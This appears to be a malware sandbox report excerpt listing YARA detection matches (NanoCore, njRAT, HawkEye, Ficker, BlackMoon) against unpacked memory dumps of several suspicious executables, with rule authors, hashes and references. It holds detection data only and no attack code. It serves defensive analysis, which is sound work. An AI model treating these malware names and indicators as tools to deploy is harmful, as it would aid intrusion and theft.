                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 11.0.22.exe.5f65b6.23.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.22.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.5f65b6.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.43de6f.19.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.16.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.43de6f.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 11.0.22.exe.43de6f.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 11.0.22.exe.530edf.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
